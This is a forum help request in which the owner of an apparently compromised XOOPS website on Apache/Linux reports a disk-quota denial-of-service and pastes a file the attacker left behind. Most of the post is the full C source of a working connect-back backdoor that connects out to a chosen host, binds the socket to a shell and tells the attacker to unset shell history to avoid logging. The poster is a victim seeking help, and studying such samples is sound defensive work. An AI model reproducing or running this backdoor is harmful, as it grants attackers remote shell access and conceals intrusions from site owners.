1
           
            
                
     
    
    My XOOPS web site is down, because of classic DOS -space quota- attack
Web site is on Appache, Linux server...
I found this temp file on the server left by attacker, may be it could give you more info:
" #include 
#include 
#include 
#include 
#include 
int main(int argc, char **argv) {
 char *host;
 int port = 80;
 int f;
 int l;
 int sock;
 struct in_addr ia;
 struct sockaddr_in sin, from;
 struct hostent *he;
 char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
 "Issue \"export TERM=xterm; exec bash -i\"\n"
 "For More Reliable Shell.\n"
 "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
 "For Not Getting Logged.\n(;\n\n";
 printf("Ir4dex Connect Back Backdoor\n\n");
 if (argc < 2 || argc > 3) {
 printf("Usage: %s [Host] \n", argv[0]);
 return 1;
 }
 printf("[*] Dumping Arguments\n");
 l = strlen(argv[1]);
 if (l <= 0) {
 printf("[-] Invalid Host Name\n");
 return 1;
 }
 if (!(host = (char *) malloc(l))) {
 printf("[-] Unable to Allocate Memory\n");
 return 1;
 }
 strncpy(host, argv[1], l);
 if (argc == 3) {
 port = atoi(argv[2]);
 if (port <= 0 || port > 65535) {
 printf("[-] Invalid Port Number\n");
 return 1;
 }
 }
 printf("[*] Resolvendo Nome Do Host\n");
 he = gethostbyname(host);
 if (he) {
 memcpy(&ia.s_addr, he->h_addr, 4);
 } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
 printf("[-] Unable to Resolve: %s\n", host);
 return 1;
 }
 sin.sin_family = PF_INET;
 sin.sin_addr.s_addr = ia.s_addr;
 sin.sin_port = htons(port);
 printf("[*] Conectando...\n");
 if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
 printf("[-] Socket Error\n");
 return 1;
 }
 if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
 printf("[-] Unable to Connect\n");
 return 1;
 }
 printf("[*] Spawning Shell\n");
 f = fork( );
 if (f < 0) {
 printf("[-] Unable to Fork\n");
 return 1;
 } else if (!f) {
 write(sock, msg, sizeof(msg));
 dup2(sock, 0);
 dup2(sock, 1);
 dup2(sock, 2);
 execl("/bin/sh", "shell", NULL);
 close(sock);
 return 0;
 }
 printf("[*] Conectado\n\n");
 return 0;
} "
Does anybody know a quick fix for this? Please!